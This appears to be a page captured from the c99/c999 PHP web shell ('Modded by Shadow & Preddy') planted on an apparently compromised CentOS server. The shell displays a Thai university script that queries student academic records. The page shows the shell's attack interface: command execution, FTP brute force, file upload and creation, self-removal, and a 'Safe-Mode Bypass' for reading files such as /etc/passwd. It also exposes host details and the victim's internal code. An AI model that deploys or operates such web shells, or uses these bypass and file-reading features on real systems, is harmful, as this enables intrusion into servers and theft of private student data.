!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/xmigratex/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mof_ssm.php (6.28 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
<?php
    
//$localhost_s = $_POST["localhost_s"];
    //$localhost_u = $_POST["localhost_u"];
    //$localhost_p = $_POST["localhost_p"];
    //echo "tUsername = $tUsername<br>";
    //echo "tPassword = $tPassword<br>";
    //echo "dbNo = $dbNo<br>";
//    echo "dbNo = $dbNo<br>";
    //echo '<br><br>เริ่มลบข้อมูล<br>';

    
$dbreg $_POST["dbreg"];
    
$dbmoreg $_POST["dbmoreg"];
    
$dbppc $_POST["dbppc"];
    
$oums $_POST["oums"];
    
$nums $_POST["nums"];
    
$host $_POST["localhost_s"];
    
$tUsername $_POST["localhost_u"];
    
$tPassword $_POST["localhost_p"];
    
$dbNo $_POST["dbNo"];

    
$ln_reg mysql_connect($host$tUsername$tPasswordtrue);
    if (!
$ln_reg) {
        echo 
"<font color='#FF0000'>$source_s";
        die(
' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' mysql_error());
        echo 
"</font >";
    }else{
        
//echo "Connected $source_s successfully<br>";
        
}

    
$db_info mysql_select_db($dbreg$ln_reg);
    
//mysql_query("SET NAMES 'utf8'", $ln_info);
    
if (!$db_info) {
        die (
'ไม่สามารถเชื่อมต่อฐานข้อมูล'.$dbmoreg.'ได้: ' mysql_error());
    }else{
        echo 
" เชื่อมต่อฐานข้อมูล $dbreg สำเร็จ<br>";
    }

echo 
"<br><br>";
?>

<table border="1" class='tb_1'>

<?php
    
//$query = "SELECT * FROM $dbmoreg.rg_StudentSummary WHERE 1 ORDER BY ssmStdId,ssmAcY,ssmTmId";
//SELECT studentId, count( passStatus ) passStatus FROM reg.StudentStatus WHERE passStatus IN (1,2,3) GROUP BY studentId HAVING count( passStatus ) >3
//    $query = "SELECT * FROM $dbreg.StudentStatus WHERE 1 ORDER BY studentId,acadYear,semester";
$query "SELECT 
studentId
,acadYear
,semester
,studentStatus
,GPA
,creditAttempt
,creditSatisfy
,creditPoint
,GPAX
,sumCreditAttempt
,sumCreditSatisfy
,sumCreditPoint
,createDateTime
,createUserId
,updateDateTime
,updateUserId
,approveSpe
,approver
,refNo
,CONCAT(YEAR(approveDate)-543,'-',MONTH(approveDate),'-',DAY(approveDate)) AS approveDate
,passStatus
, (
    SELECT count( studentId ) +1 AS npass
    FROM $dbreg.`StudentStatus` ss2
    WHERE ss.studentId = ss2.studentId
        AND (
            ss2.acadYear < ss.acadYear
        OR (
            ss2.acadYear = ss.acadYear
        AND ss2.semester < ss.semester
            )
        )
        AND ss2.passStatus
        IN ( 1, 2, 3 )
    ) AS sy
FROM $dbreg.`StudentStatus` ss
WHERE 1 =1
ORDER BY studentId,acadYear,semester
"
;
    
$result mysql_query($query$ln_reg);
    
$num_rows mysql_num_rows($result);

?>
<tr><th colspan="9" align="right">StudentStatus &nbsp; ข้อมูล&nbsp;<?php echo $num_rows?>&nbsp;แถว</th></tr>
<tr>
    <th>ลำดับ</th>
    <th>รหัสนักศึกษา<br>studentId</th>
    <th>ปีการศึกษา<br>acadYear</th>
    <th>ภาคการศึกษา<br>semester</th>
    <th>สถานะนึกศึกษา<br>studentStatus</th>
    <th>ประมาลผล<br>passStatus</th>
    <th>ชั้นปี<br>sy</th>
    <th>-<br>GPAX</th>
    <th>-<br>PassStatus</th>
</tr>
<?php
    $index 
=1;
    
$stdId =0;
    
$tr_class '#e5e5e5';
    while (
$cur_row mysql_fetch_object($result)) {
        if(
$stdId != $cur_row->ssmStdId){
            if(
$tr_class=='#e5e5e5')
                
$tr_class '#d3dce3';
            else
                
$tr_class '#e5e5e5';
            
$stdId $cur_row->ssmStdId;
        }
        
$style "style='background-color: $tr_class ;'";
?>
    <tr >
        <td <?php echo $style?>><?php echo $index?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentId?></td>
        <td <?php echo $style?>><?php echo $cur_row->acadYear?></td>
        <td <?php echo $style?>><?php echo $cur_row->semester?></td>
        <td <?php echo $style?>><?php echo $cur_row->studentStatus?></td>
        <td <?php echo $style?>><?php echo $cur_row->passStatus?></td>
        <td <?php echo $style?>><?php echo $cur_row->sy?></td>
        <td <?php echo $style?>><?php echo $cur_row->GPAX?></td>
<?php
        
if($index+$num_rows){
        if (
mysql_data_seek($result$index)) { // มีแถวถัดไปมั้ย
            
$next mysql_fetch_object($result);
            if(
$next->studentId == $cur_row->studentId && $next->acadYear $cur_row->acadYear){
                if(
$cur_row->studentStatus == && $cur_row->passStatus ){
?>
        <td <?php echo $style?>><?php echo '1|2|3'?></td>
<?php
                
}elseif($cur_row->studentStatus ==&& $cur_row->passStatus >= && $cur_row->GPAX 1.95){ 
                    echo 
"<td $style>$cur_row->passStatus</td>";
                }elseif(
$cur_row->studentStatus !=&& $cur_row->passStatus 4){ 
                    echo 
"<td $style>0</td>";
                }elseif(
$cur_row->studentStatus !=&& $cur_row->passStatus >= && $cur_row->GPAX 1.95){ 
                    echo 
"<td $style>$cur_row->passStatus</td>";
                }else{
                    echo 
"<td $style></td>";
                }

            }else{ echo 
'<td></td>';}
            
mysql_data_seek($result$index); // หลังการ fetch result ต้องตั้งค่าให้แถวถัดไปเท่าเก่า 
        
}
        }
/*
        if($index==2){
            if (mysql_data_seek($result, $index)) {

                $next = mysql_fetch_object($result);
                    echo '- '.$index;
                    echo '&nbsp; , &nbsp;'.$next->ssmStdId.'';
                    echo '&nbsp; , &nbsp;'.$next->ssmAcY;
                    echo '&nbsp; , &nbsp;'.$next->ssmTmId.'<br>';
                mysql_data_seek($result, $index);
            }else{
                echo 'end loop';
            }
        }
        */
        
$index++;
?>    
        </tr>
<?php

    
}
    
mysql_free_result($result);
?>
</table >

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0095 ]--